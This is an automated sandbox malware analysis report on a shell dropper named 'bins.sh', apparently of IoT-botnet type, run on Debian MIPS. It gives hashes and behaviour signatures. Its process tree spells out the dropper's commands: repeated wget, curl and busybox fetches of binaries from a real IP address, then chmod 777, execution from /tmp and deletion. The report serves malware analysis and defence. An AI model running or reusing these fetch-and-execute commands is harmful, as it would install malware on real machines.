Analysis
-
max time kernel
111s -
max time network
141s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 752 chmod 945 chmod 897 chmod 745 chmod 859 chmod 879 chmod 933 chmod 939 chmod 885 chmod 927 chmod 951 chmod 969 chmod 981 chmod 987 chmod 891 chmod 915 chmod 975 chmod 825 chmod 831 chmod 957 chmod 903 chmod 758 chmod 778 chmod 816 chmod 909 chmod 921 chmod 873 chmod 963 chmod -
Executes dropped EXE 28 IoCs
Processes:
Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigllb9hjKgLiksrxr40vGLawuxTS92IUqQec3RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0Rb9hjKgLiksrxr40vGLawuxTS92IUqQec3R1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigll0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBIx6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsAxqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhzMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1ioc pid Process /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 746 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 753 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 759 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 779 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 817 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 826 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 832 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 860 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 874 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 880 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 886 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 892 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 898 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 904 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 910 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 916 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 922 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 928 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 934 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 940 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 946 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 952 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 958 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 964 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 970 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 976 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 982 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 988 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlbusybox13LziPPOU64KElhsy06VSGNerH5jNdigllwgetcurlwgetrmbusybox13LziPPOU64KElhsy06VSGNerH5jNdigllrmpid Process 895 curl 896 busybox 898 13LziPPOU64KElhsy06VSGNerH5jNdigll 936 wget 937 curl 894 wget 899 rm 938 busybox 940 13LziPPOU64KElhsy06VSGNerH5jNdigll 941 rm -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlwgetbusyboxcurlcurldescription ioc Process File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB wget File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB busybox File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:719
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:741
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:751
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:754
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:755
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:757
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:760
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:761
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:773
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:782
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:783
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:807
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:824
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:830
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:835
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:837
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:854
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:864
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:865
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:872
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:878
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:884
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:890
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:898
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:902
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:908
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:914
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:920
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:926
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:929
-
-
